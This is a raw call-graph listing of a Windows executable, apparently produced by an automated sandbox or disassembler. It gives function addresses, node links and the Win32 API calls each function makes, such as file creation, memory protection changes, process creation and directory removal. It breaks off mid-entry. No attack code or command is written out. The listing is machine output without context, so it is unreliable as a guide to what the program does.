6178 406680 IsDBCSLeadByte 6177->6178 6179 4067b4 6177->6179 6178->6179 6179->6170 6180->6177 6182 406773 6180->6182 6182->6179 6191 406680 IsDBCSLeadByte 6182->6191 6183->6170 6185 403486 6184->6185 6186 403459 6184->6186 6187 403198 4 API calls 6185->6187 6186->6185 6189 40346d 6186->6189 6188 40347c 6187->6188 6188->6175 6190 403278 18 API calls 6189->6190 6190->6188 6192 406694 6191->6192 6192->6182 6194 403198 4 API calls 6193->6194 6196 4091d1 6194->6196 6198 4091fe 6196->6198 6210 4032a8 6196->6210 6213 403494 6196->6213 6199 403198 4 API calls 6198->6199 6200 409213 6199->6200 6200->6125 6202 408f70 2 API calls 6201->6202 6203 40904a 6202->6203 6204 40904e 6203->6204 6217 406a48 6203->6217 6204->6125 6207 409081 6208 408fac Wow64RevertWow64FsRedirection 6207->6208 6209 409089 6208->6209 6209->6125 6211 403278 18 API calls 6210->6211 6212 4032b5 6211->6212 6212->6196 6214 403498 6213->6214 6216 4034c3 6213->6216 6215 4034f0 18 API calls 6214->6215 6215->6216 6216->6196 6218 4069dc 21 API calls 6217->6218 6219 406a52 GetLastError 6218->6219 6219->6207 6221 406744 IsDBCSLeadByte 6220->6221 6223 406835 6221->6223 6222 40687f 6222->5989 6223->6222 6224 406680 IsDBCSLeadByte 6223->6224 6224->6223 6226 4068f3 6225->6226 6227 406820 IsDBCSLeadByte 6226->6227 6229 4068fe 6227->6229 6228 4066ea 6228->5994 6228->5995 6229->6228 6230 406680 IsDBCSLeadByte 6229->6230 6230->6229 6232 406957 6231->6232 6233 40695b 6231->6233 6232->6008 6236 406970 CharPrevA 6233->6236 6235 40696c 6235->6008 6236->6235 6811 408f30 6814 408dfc 6811->6814 6815 408e05 6814->6815 6816 403198 4 API calls 6815->6816 6817 408e13 6815->6817 6816->6815 6818 403932 6819 403924 6818->6819 6820 40374c VariantClear 6819->6820 6821 40392c 6820->6821 5381 4075c4 SetFilePointer 5382 4075f7 5381->5382 5383 4075e7 GetLastError 5381->5383 5383->5382 5384 4075f0 5383->5384 5386 40748c GetLastError 5384->5386 5389 4073ec 5386->5389 5390 407284 19 API calls 5389->5390 5391 407414 5390->5391 5392 407434 5391->5392 5393 405194 33 API calls 5391->5393 5394 405890 18 API calls 5392->5394 5393->5392 5395 407443 5394->5395 5396 403198 4 API calls 5395->5396 5397 407460 5396->5397 5397->5382 6412 4076c8 WriteFile 6413 4076e8 6412->6413 6414 4076ef 6412->6414 6415 40748c 35 API calls 6413->6415 6416 407700 6414->6416 6417 4073ec 34 API calls 6414->6417 6415->6414 6417->6416 6418 402ccc 6421 402cfe 6418->6421 6422 402cdd 6418->6422 6419 402d88 RtlUnwind 6420 403154 4 API calls 6419->6420 6420->6421 6422->6419 6422->6421 6423 402b28 RaiseException 6422->6423 6424 402d7f 6423->6424 6424->6419 6830 403fcd 6831 403f07 4 API calls 6830->6831 6832 403fd6 6831->6832 6833 403e9c 4 API calls 6832->6833 6834 403fe2 6833->6834 6431 4024d0 6432 4024e4 6431->6432 6433 4024e9 6431->6433 6436 401918 4 API calls 6432->6436 6434 402518 6433->6434 6435 40250e RtlEnterCriticalSection 6433->6435 6438 4024ed 6433->6438 6446 402300 6434->6446 6435->6434 6436->6433 6439 402525 6442 402581 6439->6442 6443 402577 RtlLeaveCriticalSection 6439->6443 6441 401fd4 14 API calls 6444 402531 6441->6444 6443->6442 6444->6439 6445 40215c 9 API calls 6444->6445 6445->6439 6447 402314 6446->6447 6449 402335 6447->6449 6450 4023b8 6447->6450 6448 402344 6448->6439 6448->6441 6449->6448 6452 401b74 9 API calls 6449->6452 6450->6448 6451 401d80 9 API calls 6450->6451 6454 402455 6450->6454 6456 401e84 6450->6456 6451->6450 6452->6448 6454->6448 6455 401d00 9 API calls 6454->6455 6455->6448 6461 401768 6456->6461 6458 401e99 6459 401ea6 6458->6459 6460 401dcc 9 API calls 6458->6460 6459->6450 6460->6459 6462 401787 6461->6462 6463 40183b 6462->6463 6464 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6462->6464 6466 40132c LocalAlloc 6462->6466 6467 401821 6462->6467 6469 4017d6 6462->6469 6465 4015c4 VirtualAlloc 6463->6465 6470 4017e7 6463->6470 6464->6462 6465->6470 6466->6462 6468 40150c VirtualFree 6467->6468 6468->6470 6471 40150c VirtualFree 6469->6471 6470->6458 6471->6470 6472 4028d2 6473 4028da 6472->6473 6474 403554 4 API calls 6473->6474 6475 4028ef 6473->6475 6474->6473 6476 4025ac 4 API calls 6475->6476 6477 4028f4 6476->6477 6835 4019d3 6836 4019ba 6835->6836 6837 4019c3 RtlLeaveCriticalSection 6836->6837 6838 4019cd 6836->6838 6837->6838 5398 407fd4 5399 407fe6 5398->5399 5401 407fed 5398->5401 5409 407f10 5399->5409 5403 408017 5401->5403 5405 408015 5401->5405 5407 408021 5401->5407 5402 40804e 5420 407d7c 5403->5420 5404 407d7c 33 API calls 5404->5402 5423 407e2c 5405->5423 5407->5402 5407->5404 5410 407f25 5409->5410 5411 407d7c 33 API calls 5410->5411 5412 407f34 5410->5412 5411->5412 5413 407f6e 5412->5413 5414 407d7c 33 API calls 5412->5414 5415 407f82 5413->5415 5416 407d7c 33 API calls 5413->5416 5414->5413 5419 407fae 5415->5419 5430 407eb8 5415->5430 5416->5415 5419->5401 5433 4058c4 5420->5433 5422 407d9e 5422->5407 5424 405194 33 API calls 5423->5424 5425 407e57 5424->5425 5441 407de4 5425->5441 5427 407e5f 5428 403198 4 API calls 5427->5428 5429 407e74 5428->5429 5429->5407 5431 407ec7 VirtualFree 5430->5431 5432 407ed9 VirtualAlloc 5430->5432 5431->5432 5432->5419 5435 4058d0 5433->5435 5434 405194 33 API calls 5436 4058fd 5434->5436 5435->5434 5437 4031e8 18 API calls 5436->5437 5438 405908 5437->5438 5439 403198 4 API calls 5438->5439 5440 40591d 5439->5440 5440->5422 5442 4058c4 33 API calls 5441->5442 5443 407e06 5442->5443 5443->5427 6478 405ad4 6479 405adc 6478->6479 6480 405ae4 6478->6480 6481 405ae2 6479->6481 6482 405aeb 6479->6482 6485 405a4c 6481->6485 6483 405940 19 API calls 6482->6483 6483->6480 6486 405a54 6485->6486 6487 405a6e 6486->6487 6490 403154 4 API calls 6486->6490 6488 405a73 6487->6488 6489 405a8a 6487->6489 6491 405940 19 API calls 6488->6491 6492 403154 4 API calls 6489->6492 6490->6486 6493 405a86 6491->6493 6494 405a8f 6492->6494 6496 403154 4 API calls 6493->6496 6495 4059b0 33 API calls 6494->6495 6495->6493 6497 405ab8 6496->6497 6498 403154 4 API calls 6497->6498 6499 405ac6 6498->6499 6499->6480 5911 40a9de 5912 40aa03 5911->5912 5913 407918 InterlockedExchange 5912->5913 5914 40aa2d 5913->5914 5915 409ae8 18 API calls 5914->5915 5916 40aa3d 5914->5916 5915->5916 5921 4076ac SetEndOfFile 5916->5921 5918 40aa59 5919 4025ac 4 API calls 5918->5919 5920 40aa90 5919->5920 5922 4076c3 5921->5922 5923 4076bc 5921->5923 5922->5918 5924 40748c 35 API calls 5923->5924 5924->5922 6842 402be9 RaiseException 6843 402c04 6842->6843 6510 402af2 6511 402afe 6510->6511 6514 402ed0 6511->6514 6515 403154 4 API calls 6514->6515 6517 402ee0 6515->6517 6516 402b03 6517->6516 6519 402b0c 6517->6519 6520 402b25 6519->6520 6521 402b15 RaiseException 6519->6521 6520->6516 6521->6520 5449 40a5f8 5492 4030dc 5449->5492 5451 40a60e 5495 4042e8 5451->5495 5453 40a613 5498 40457c GetModuleHandleA GetProcAddress 5453->5498 5457 40a61d 5506 4065c8 5457->5506 5459 40a622 5515 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5459->5515 5468 40a665 5537 406c2c 5468->5537 5470 4031e8 18 API calls 5471 40a683 5470->5471 5551 4074e0 5471->5551 5477 407918 InterlockedExchange 5479 40a6d2 5477->5479 5478 40a710 5571 4074a0 5478->5571 5479->5478 5608 409ae8 5479->5608 5481 40a751 5575 407a28 5481->5575 5482 40a736 5482->5481 5484 409ae8 18 API calls 5482->5484 5484->5481 5485 40a776 5585 408b08 5485->5585 5489 40a7bc 5490 408b08 35 API calls 5489->5490 5491 40a7f5 5489->5491 5490->5489 5618 403094 5492->5618 5494 4030e1 GetModuleHandleA GetCommandLineA 5494->5451 5496 403154 4 API calls 5495->5496 5497 404323 5495->5497 5496->5497 5497->5453 5499 404598 5498->5499 5500 40459f GetProcAddress 5498->5500 5499->5500 5501 4045b5 GetProcAddress 5500->5501 5502 4045ae 5500->5502 5503 4045c4 SetProcessDEPPolicy 5501->5503 5504 4045c8 5501->5504 5502->5501 5503->5504 5505 404624 6FAA1CD0 5504->5505 5505->5457 5619 405ca8 5506->5619 5516 4090f7 5515->5516 5703 406fa0 SetErrorMode 5516->5703 5519 407284 19 API calls 5520 409127 5519->5520 5521 403198 4 API calls 5520->5521 5522 40913c 5521->5522 5523 409b78 GetSystemInfo VirtualQuery 5522->5523 5524 409c2c 5523->5524 5527 409ba2 5523->5527 5529 409768 5524->5529 5525 409c0d VirtualQuery 5525->5524 5525->5527 5526 409bcc VirtualProtect 5526->5527 5527->5524 5527->5525 5527->5526 5528 409bfb VirtualProtect 5527->5528 5528->5525 5709 406bd0 GetCommandLineA 5529->5709 5531 409850 5533 4031b8 4 API calls 5531->5533 5532 406c2c 20 API calls 5536 409785 5532->5536 5534 40986a 5533->5534 5534->5468 5601 409c88 5534->5601 5535 403454 18 API calls 5535->5536 5536->5531 5536->5532 5536->5535 5538 406c53 GetModuleFileNameA 5537->5538 5539 406c77 GetCommandLineA 5537->5539 5540 403278 18 API calls 5538->5540 5547 406c7c 5539->5547 5541 406c75 5540->5541 5545 406ca4 5541->5545 5542 406c81 5543 403198 4 API calls 5542->5543 5546 406c89 5543->5546 5544 406af0 18 API calls 5544->5547 5548 403198 4 API calls 5545->5548 5549 40322c 4 API calls 5546->5549 5547->5542 5547->5544 5547->5546 5550 406cb9 5548->5550 5549->5545 5550->5470 5552 4074ea 5551->5552 5716 407576 5552->5716 5719 407578 5552->5719 5553 407516 5554 40752a 5553->5554 5555 40748c 35 API calls 5553->5555 5558 409c34 FindResourceA 5554->5558 5555->5554 5559 409c49 5558->5559 5560 409c4e SizeofResource 5558->5560 5561 409ae8 18 API calls 5559->5561 5562 409c60 LoadResource 5560->5562 5563 409c5b 5560->5563 5561->5560 5565 409c73 LockResource 5562->5565 5566 409c6e 5562->5566 5564 409ae8 18 API calls 5563->5564 5564->5562 5568 409c84 5565->5568 5569 409c7f 5565->5569 5567 409ae8 18 API calls 5566->5567 5567->5565 5568->5477 5568->5479 5570 409ae8 18 API calls 5569->5570 5570->5568 5572 4074b4 5571->5572 5573 4074c4 5572->5573 5574 4073ec 34 API calls 5572->5574 5573->5482 5574->5573 5576 407a35 5575->5576 5577 405890 18 API calls 5576->5577 5578 407a89 5576->5578 5577->5578 5579 407918 InterlockedExchange 5578->5579 5580 407a9b 5579->5580 5581 405890 18 API calls 5580->5581 5582 407ab1 5580->5582 5581->5582 5583 405890 18 API calls 5582->5583 5584 407af4 5582->5584 5583->5584 5584->5485 5590 408b82 5585->5590 5597 408b39 5585->5597 5586 408bcd 5722 407cb8 5586->5722 5587 407cb8 35 API calls 5587->5597 5589 408be4 5593 4031b8 4 API calls 5589->5593 5590->5586 5592 4034f0 18 API calls 5590->5592 5598 4031e8 18 API calls 5590->5598 5599 403420 18 API calls 5590->5599 5600 407cb8 35 API calls 5590->5600 5591 4034f0 18 API calls 5591->5597 5592->5590 5596 408bfe 5593->5596 5594 403420 18 API calls 5594->5597 5595 4031e8 18 API calls 5595->5597 5615 404c20 5596->5615 5597->5587 5597->5590 5597->5591 5597->5594 5597->5595 5598->5590 5599->5590 5600->5590 5602 40322c 4 API calls 5601->5602 5603 409cab 5602->5603 5604 409cba MessageBoxA 5603->5604 5605 409ccf 5604->5605 5606 403198 4 API calls 5605->5606 5607 409cd7 5606->5607 5607->5468 5609 409af1 5608->5609 5610 409b09 5608->5610 5611 405890 18 API calls 5609->5611 5612 405890 18 API calls 5610->5612 5613 409b03 5611->5613 5614 409b1a 5612->5614 5613->5478 5614->5478 5744 402594 5615->5744 5617 404c2b 5617->5489 5618->5494 5620 405940 19 API calls 5619->5620 5621 405cb9 5620->5621 5622 405280 GetSystemDefaultLCID 5621->5622 5626 4052b6 5622->5626 5623 40520c 19 API calls 5623->5626 5624 4031e8 18 API calls 5624->5626 5625 404cdc 19 API calls 5625->5626 5626->5623 5626->5624 5626->5625 5627 405318 5626->5627 5628 4031e8 18 API calls 5627->5628 5629 404cdc 19 API calls 5627->5629 5630 40520c 19 API calls 5627->5630 5631 40539b 5627->5631 5628->5627 5629->5627 5630->5627 5632 4031b8 4 API calls 5631->5632 5633 4053b5 5632->5633 5634 4053c4 GetSystemDefaultLCID 5633->5634 5691 40520c GetLocaleInfoA 5634->5691 5637 4031e8 18 API calls 5638 405404 5637->5638 5639 40520c 19 API calls 5638->5639 5640 405419 5639->5640 5641 40520c 19 API calls 5640->5641 5642 40543d 5641->5642 5697 405258 GetLocaleInfoA 5642->5697 5645 405258 GetLocaleInfoA 5646 40546d 5645->5646 5647 40520c 19 API calls 5646->5647 5648 405487 5647->5648 5649 405258 GetLocaleInfoA 5648->5649 5650 4054a4 5649->5650 5651 40520c 19 API calls 5650->5651 5652 4054be 5651->5652 5653 4031e8 18 API calls 5652->5653 5654 4054cb 5653->5654 5655 40520c 19 API calls 5654->5655 5656 4054e0 5655->5656 5657 4031e8 18 API calls 5656->5657 5658 4054ed 5657->5658 5659 405258 GetLocaleInfoA 5658->5659 5660 4054fb 5659->5660 5661 40520c 19 API calls 5660->5661 5662 405515 5661->5662 5663 4031e8 18 API calls 5662->5663 5664 405522 5663->5664 5665 40520c 19 API calls 5664->5665 5666 405537 5665->5666 5667 4031e8 18 API calls 5666->5667 5668 405544 5667->5668 5669 40520c 19 API calls 5668->5669 5670 405559 5669->5670 5671 405576 5670->5671 5672 405567 5670->5672 5674 40322c 4 API calls 5671->5674 5699 40322c 5672->5699 5675 405574 5674->5675 5676 40520c 19 API calls 5675->5676 5677 405598 5676->5677 5678 4055b5 5677->5678 5679 4055a6 5677->5679 5681 403198 4 API calls 5678->5681 5680 40322c 4 API calls 5679->5680 5682 4055b3 5680->5682 5681->5682 5683 4033b4 18 API calls 5682->5683 5684 4055d7 5683->5684 5685 4033b4 18 API calls 5684->5685 5686 4055f1 5685->5686 5687 4031b8 4 API calls 5686->5687 5688 40560b 5687->5688 5689 405cf4 GetVersionExA 5688->5689 5690 405d0b 5689->5690 5690->5459 5692 405233 5691->5692 5693 405245 5691->5693 5694 403278 18 API calls 5692->5694 5695 40322c 4 API calls 5693->5695 5696 405243 5694->5696 5695->5696 5696->5637 5698 405274 5697->5698 5698->5645 5701 403230 5699->5701 5700 403252 5700->5675 5701->5700 5702 4025ac 4 API calls 5701->5702 5702->5700 5707 403414 5703->5707 5706 406fee 5706->5519 5708 403418 LoadLibraryA 5707->5708 5708->5706 5710 406af0 18 API calls 5709->5710 5711 406bf3 5710->5711 5712 406c05 5711->5712 5713 406af0 18 API calls 5711->5713 5714 403198 4 API calls 5712->5714 5713->5711 5715 406c1a 5714->5715 5715->5536 5717 407578 5716->5717 5718 4075b7 CreateFileA 5717->5718 5718->5553 5720 403414 5719->5720 5721 4075b7 CreateFileA 5720->5721 5721->5553 5723 407cd3 5722->5723 5725 407cc8 5722->5725 5728 407c5c 5723->5728 5725->5589 5727 405890 18 API calls 5727->5725 5729 407c70 5728->5729 5730 407caf 5728->5730 5729->5730 5732 407bac 5729->5732 5730->5725 5730->5727 5733 407bb7 5732->5733 5734 407bc8 5732->5734 5736 405890 18 API calls 5733->5736 5735 4074a0 34 API calls 5734->5735 5737 407bdc 5735->5737 5736->5734 5738 4074a0 34 API calls 5737->5738 5739 407bfd 5738->5739 5740 407918 InterlockedExchange 5739->5740 5741 407c12 5740->5741 5742 407c28 5741->5742 5743 405890 18 API calls 5741->5743 5742->5729 5743->5742 5745 402598 5744->5745 5747 4025a2 5744->5747 5750 401fd4 5745->5750 5746 40259e 5746->5747 5748 403154 4 API calls 5746->5748 5747->5617 5747->5747 5748->5747 5751 401fe8 5750->5751 5752 401fed 5750->5752 5761 401918 RtlInitializeCriticalSection 5751->5761 5754 402012 RtlEnterCriticalSection 5752->5754 5755 40201c 5752->5755 5758 401ff1 5752->5758 5754->5755 5755->5758 5768 401ee0 5755->5768 5758->5746 5759 402147 5759->5746 5760 40213d RtlLeaveCriticalSection 5760->5759 5762 40193c RtlEnterCriticalSection 5761->5762 5763 401946 5761->5763 5762->5763 5764 401964 LocalAlloc 5763->5764 5765 40197e 5764->5765 5766 4019c3 RtlLeaveCriticalSection 5765->5766 5767 4019cd 5765->5767 5766->5767 5767->5752 5771 401ef0 5768->5771 5769 401f1c 5773 401f40 5769->5773 5779 401d00 5769->5779 5771->5769 5771->5773 5774 401e58 5771->5774 5773->5759 5773->5760 5783 4016d8 5774->5783 5777 401e75 5777->5771 5780 401d4e 5779->5780 5781 401d1e 5779->5781 5780->5781 5852 401c68 5780->5852 5781->5773 5786 4016f4 5783->5786 5785 4016fe 5808 4015c4 5785->5808 5786->5785 5788 40175b 5786->5788 5790 40174f 5786->5790 5800 401430 5786->5800 5812 40132c 5786->5812 5788->5777 5793 401dcc 5788->5793 5816 40150c 5790->5816 5791 40170a 5791->5788 5826 401d80 5793->5826 5796 40132c LocalAlloc 5797 401df0 5796->5797 5799 401df8 5797->5799 5830 401b44 5797->5830 5799->5777 5801 40143f VirtualAlloc 5800->5801 5803 40146c 5801->5803 5804 40148f 5801->5804 5820 4012e4 5803->5820 5804->5786 5807 40147c VirtualFree 5807->5804 5810 40160a 5808->5810 5809 40163a 5809->5791 5810->5809 5811 401626 VirtualAlloc 5810->5811 5811->5809 5811->5810 5813 401348 5812->5813 5814 4012e4 LocalAlloc 5813->5814 5815 40138f 5814->5815 5815->5786 5819 40153b 5816->5819 5817 401594 5817->5788 5818 401568 VirtualFree 5818->5819 5819->5817 5819->5818 5823 40128c 5820->5823 5824 401298 LocalAlloc 5823->5824 5825 4012aa 5823->5825 5824->5825 5825->5804 5825->5807 5827 401d89 5826->5827 5829 401d92 5826->5829 5827->5829 5835 401b74 5827->5835 5829->5796 5831 401b61 5830->5831 5832 401b52 5830->5832 5831->5799 5833 401d00 9 API calls 5832->5833 5834 401b5f 5833->5834 5834->5799 5838 40215c 5835->5838 5837 401b95 5837->5829 5839 40217a 5838->5839 5840 402175 5838->5840 5842 4021ab RtlEnterCriticalSection 5839->5842 5843 40217e 5839->5843 5850 4021b5 5839->5850 5841 401918 4 API calls 5840->5841 5841->5839 5842->5850 5843->5837 5844 4021c1 5846 4022e3 RtlLeaveCriticalSection 5844->5846 5847 4022ed 5844->5847 5845 402244 5845->5843 5848 401d80 7 API calls 5845->5848 5846->5847 5847->5837 5848->5843 5849 402270 5849->5844 5851 401d00 7 API calls 5849->5851 5850->5844 5850->5845 5850->5849 5851->5844 5853 401c7a 5852->5853 5854 401c9d 5853->5854 5855 401caf 5853->5855 5865 40188c 5854->5865 5857 40188c 3 API calls 5855->5857 5858 401cad 5857->5858 5859 401b44 9 API calls 5858->5859 5864 401cc5 5858->5864 5860 401cd4 5859->5860 5861 401cee 5860->5861 5875 401b98 5860->5875 5880 4013a0 5861->5880 5864->5781 5866 4018b2 5865->5866 5874 40190b 5865->5874 5884 401658 5866->5884 5869 40132c LocalAlloc 5870 4018cf 5869->5870 5871 40150c VirtualFree 5870->5871 5872 4018e6 5870->5872 5871->5872 5873 4013a0 LocalAlloc 5872->5873 5872->5874 5873->5874 5874->5858 5876 401bab 5875->5876 5877 401b9d 5875->5877 5876->5861 5878 401b74 9 API calls 5877->5878 5879 401baa 5878->5879 5879->5861 5881 4013ab 5880->5881 5882 4013c6 5881->5882 5883 4012e4 LocalAlloc 5881->5883 5882->5864 5883->5882 5886 40168f 5884->5886 5885 4016cf 5885->5869 5886->5885 5887 4016a9 VirtualFree 5886->5887 5887->5886 6844 402dfa 6845 402e0d 6844->6845 6847 402e26 6844->6847 6848 402ba4 6845->6848 6849 402bc9 6848->6849 6850 402bad 6848->6850 6849->6847 6851 402bb5 RaiseException 6850->6851 6851->6849 6852 4075fa GetFileSize 6853 407626 6852->6853 6854 407616 GetLastError 6852->6854 6854->6853 6855 40761f 6854->6855 6856 40748c 35 API calls 6855->6856 6856->6853 6857 406ffb 6858 407008 SetErrorMode 6857->6858 6526 403a80 CloseHandle 6527 403a90 6526->6527 6528 403a91 GetLastError 6526->6528 6529 404283 6530 4042c3 6529->6530 6531 403154 4 API calls 6530->6531 6532 404323 6531->6532 6859 404185 6860 4041ff 6859->6860 6861 4041cc 6860->6861 6862 403154 4 API calls 6860->6862 6863 404323 6862->6863 6533 403e87 6534 403e4c 6533->6534 6535 403e62 6534->6535 6536 403e7b 6534->6536 6539 403e67 6534->6539 6542 403cc8 6535->6542 6537 402674 4 API calls 6536->6537 6540 403e78 6537->6540 6539->6540 6546 402674 6539->6546 6543 403cd6 6542->6543 6544 402674 4 API calls 6543->6544 6545 403ceb 6543->6545 6544->6545 6545->6539 6547 403154 4 API calls 6546->6547 6548 40267a 6547->6548 6548->6540 6557 407e90 6558 407eb8 VirtualFree 6557->6558 6559 407e9d 6558->6559 6562 403e95 6563 403e4c 6562->6563 6564 403e62 6563->6564 6565 403e7b 6563->6565 6569 403e67 6563->6569 6567 403cc8 4 API calls 6564->6567 6566 402674 4 API calls 6565->6566 6568 403e78 6566->6568 6567->6569 6569->6568 6570 402674 4 API calls 6569->6570 6570->6568 6571 40ac97 6580 4096fc 6571->6580 6574 402f24 5 API calls 6575 40aca1 6574->6575 6576 403198 4 API calls 6575->6576 6577 40acc0 6576->6577 6578 403198 4 API calls 6577->6578 6579 40acc8 6578->6579 6589 4056ac 6580->6589 6582 409717 6583 409745 6582->6583 6595 40720c 6582->6595 6585 403198 4 API calls 6583->6585 6587 40975a 6585->6587 6586 409735 6588 40973d MessageBoxA 6586->6588 6587->6574 6587->6575 6588->6583 6590 403154 4 API calls 6589->6590 6591 4056b1 6590->6591 6592 4056c9 6591->6592 6593 403154 4 API calls 6591->6593 6592->6582 6594 4056bf 6593->6594 6594->6582 6596 4056ac 4 API calls 6595->6596 6597 40721b 6596->6597 6598 407221 6597->6598 6600 40722f 6597->6600 6599 40322c 4 API calls 6598->6599 6601 40722d 6599->6601 6602 40724b 6600->6602 6603 40723f 6600->6603 6601->6586 6613 4032b8 6602->6613 6606 4071d0 6603->6606 6607 40322c 4 API calls 6606->6607 6608 4071df 6607->6608 6609 4071fc 6608->6609 6610 406950 CharPrevA 6608->6610 6609->6601 6611 4071eb 6610->6611 6611->6609 6612 4032fc 18 API calls 6611->6612 6612->6609 6614 403278 18 API calls 6613->6614 6615 4032c2 6614->6615 6615->6601 6616 403a97 6617 403aac 6616->6617 6618 403ab2 6617->6618 6619 403bbc GetStdHandle 6617->6619 6620 403b0e CreateFileA 6617->6620 6621 403c17 GetLastError 6619->6621 6633 403bba 6619->6633 6620->6621 6622 403b2c 6620->6622 6621->6618 6624 403b3b GetFileSize 6622->6624 6622->6633 6624->6621 6625 403b4e SetFilePointer 6624->6625 6625->6621 6629 403b6a ReadFile 6625->6629 6626 403be7 GetFileType 6626->6618 6628 403c02 CloseHandle 6626->6628 6628->6618 6629->6621 6630 403b8c 6629->6630 6631 403b9f SetFilePointer 6630->6631 6630->6633 6631->6621 6632 403bb0 SetEndOfFile 6631->6632 6632->6621 6632->6633 6633->6618 6633->6626 6638 40aaa2 6639 40aad2 6638->6639 6640 40aadc CreateWindowExA SetWindowLongA 6639->6640 6641 405194 33 API calls 6640->6641 6642 40ab5f 6641->6642 6643 4032fc 18 API calls 6642->6643 6644 40ab6d 6643->6644 6645 4032fc 18 API calls 6644->6645 6646 40ab7a 6645->6646 6647 406b7c 19 API calls 6646->6647 6648 40ab86 6647->6648 6649 4032fc 18 API calls 6648->6649 6650 40ab8f 6649->6650 6651 4099ec 43 API calls 6650->6651 6652 40aba1 6651->6652 6653 4098cc 19 API calls 6652->6653 6654 40abb4 6652->6654 6653->6654 6655 40abed 6654->6655 6656 4094d8 9 API calls 6654->6656 6657 40ac06 6655->6657 6660 40ac00 RemoveDirectoryA 6655->6660 6656->6655 6658 40ac1a 6657->6658 6659 40ac0f DestroyWindow 6657->6659 6661 40ac42 6658->6661 6662 40357c 4 API calls 6658->6662 6659->6658 6660->6657 6663 40ac38 6662->6663 6664 4025ac 4 API calls 6663->6664 6664->6661 6876 405ba2 6878 405ba4 6876->6878 6877 405be0 6881 405940 19 API calls 6877->6881 6878->6877 6879 405bf7 6878->6879 6880 405bda 6878->6880 6885 404cdc 19 API calls 6879->6885 6880->6877 6883 405c4c 6880->6883 6882 405bf3 6881->6882 6887 403198 4 API calls 6882->6887 6884 4059b0 33 API calls 6883->6884 6884->6882 6886 405c20 6885->6886 6888 4059b0 33 API calls 6886->6888 6889 405c86 6887->6889 6888->6882 6890 408da4 6891 408dc8 6890->6891 6892 408c80 18 API calls 6891->6892 6893 408dd1 6892->6893 6665 402caa 6666 403154 4 API calls 6665->6666 6667 402caf 6666->6667 6908 4011aa 6909 4011ac GetStdHandle 6908->6909 6668 4028ac 6669 402594 18 API calls 6668->6669 6670 4028b6 6669->6670 4980 40aab4 4981 40aab8 SetLastError 4980->4981 5012 409648 GetLastError 4981->5012 4984 40aad2 4986 40aadc CreateWindowExA SetWindowLongA 4984->4986 5025 405194 4986->5025 4990 40ab6d 4991 4032fc 18 API calls 4990->4991 4992 40ab7a 4991->4992 5042 406b7c GetCommandLineA 4992->5042 4995 4032fc 18 API calls 4996 40ab8f 4995->4996 5047 4099ec 4996->5047 4998 40aba1 5000 40abb4 4998->5000 5068 4098cc 4998->5068 5001 40abd4 5000->5001 5002 40abed 5000->5002 5074 4094d8 5001->5074 5004 40ac06 5002->5004 5007 40ac00 RemoveDirectoryA 5002->5007 5005 40ac1a 5004->5005 5006 40ac0f DestroyWindow 5004->5006 5008 40ac42 5005->5008 5082 40357c 5005->5082 5006->5005 5007->5004 5010 40ac38 5095 4025ac 5010->5095 5099 404c94 5012->5099 5020 4096c3 5114 4031b8 5020->5114 5026 4051a8 33 API calls 5025->5026 5027 4051a3 5026->5027 5028 4032fc 5027->5028 5029 403300 5028->5029 5030 40333f 5028->5030 5031 4031e8 5029->5031 5032 40330a 5029->5032 5030->4990 5038 403254 18 API calls 5031->5038 5039 4031fc 5031->5039 5033 403334 5032->5033 5034 40331d 5032->5034 5035 4034f0 18 API calls 5033->5035 5275 4034f0 5034->5275 5041 403322 5035->5041 5036 403228 5036->4990 5038->5039 5039->5036 5040 4025ac 4 API calls 5039->5040 5040->5036 5041->4990 5301 406af0 5042->5301 5044 406ba1 5045 403198 4 API calls 5044->5045 5046 406bbf 5045->5046 5046->4995 5315 4033b4 5047->5315 5049 409a27 5050 409a59 CreateProcessA 5049->5050 5051 409a65 5050->5051 5052 409a6c CloseHandle 5050->5052 5053 409648 35 API calls 5051->5053 5054 409a75 5052->5054 5053->5052 5055 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5054->5055 5056 409a7a MsgWaitForMultipleObjects 5055->5056 5056->5054 5057 409a91 5056->5057 5058 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5057->5058 5059 409a96 GetExitCodeProcess CloseHandle 5058->5059 5060 409ab6 5059->5060 5061 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5060->5061 5062 409abe 5061->5062 5062->4998 5063 402f24 5064 403154 4 API calls 5063->5064 5065 402f29 5064->5065 5321 402bcc 5065->5321 5067 402f51 5067->5067 5069 40990e 5068->5069 5070 4098d4 5068->5070 5069->5000 5070->5069 5071 403420 18 API calls 5070->5071 5072 409908 5071->5072 5324 408e80 5072->5324 5075 409532 5074->5075 5079 4094eb 5074->5079 5075->5002 5076 4094f3 Sleep 5076->5079 5077 409503 Sleep 5077->5079 5079->5075 5079->5076 5079->5077 5080 40951a GetLastError 5079->5080 5347 408fbc 5079->5347 5080->5075 5081 409524 GetLastError 5080->5081 5081->5075 5081->5079 5085 403591 5082->5085 5091 4035a0 5082->5091 5083 4035b1 5086 403198 4 API calls 5083->5086 5084 4035b8 5087 4031b8 4 API calls 5084->5087 5088 4035d0 5085->5088 5089 40359b 5085->5089 5090 4035b6 5085->5090 5086->5090 5087->5090 5088->5090 5093 40357c 4 API calls 5088->5093 5089->5091 5092 4035ec 5089->5092 5090->5010 5091->5083 5091->5084 5092->5090 5364 403554 5092->5364 5093->5088 5096 4025b0 5095->5096 5098 4025ba 5095->5098 5097 403154 4 API calls 5096->5097 5096->5098 5097->5098 5098->5008 5122 4051a8 5099->5122 5102 407284 FormatMessageA 5103 4072aa 5102->5103 5104 403278 18 API calls 5103->5104 5105 4072c7 5104->5105 5106 408da8 5105->5106 5107 408dc8 5106->5107 5265 408c80 5107->5265 5110 405890 5111 405897 5110->5111 5112 4031e8 18 API calls 5111->5112 5113 4058af 5112->5113 5113->5020 5116 4031be 5114->5116 5115 4031e3 5118 403198 5115->5118 5116->5115 5117 4025ac 4 API calls 5116->5117 5117->5116 5119 4031b7 5118->5119 5120 40319e 5118->5120 5119->4984 5119->5063 5120->5119 5121 4025ac 4 API calls 5120->5121 5121->5119 5123 4051c5 5122->5123 5130 404e58 5123->5130 5126 4051f1 5135 403278 5126->5135 5132 404e73 5130->5132 5131 404e85 5131->5126 5140 404be4 5131->5140 5132->5131 5143 404f7a 5132->5143 5150 404e4c 5132->5150 5136 403254 18 API calls 5135->5136 5137 403288 5136->5137 5138 403198 4 API calls 5137->5138 5139 4032a0 5138->5139 5139->5102 5257 405940 5140->5257 5142 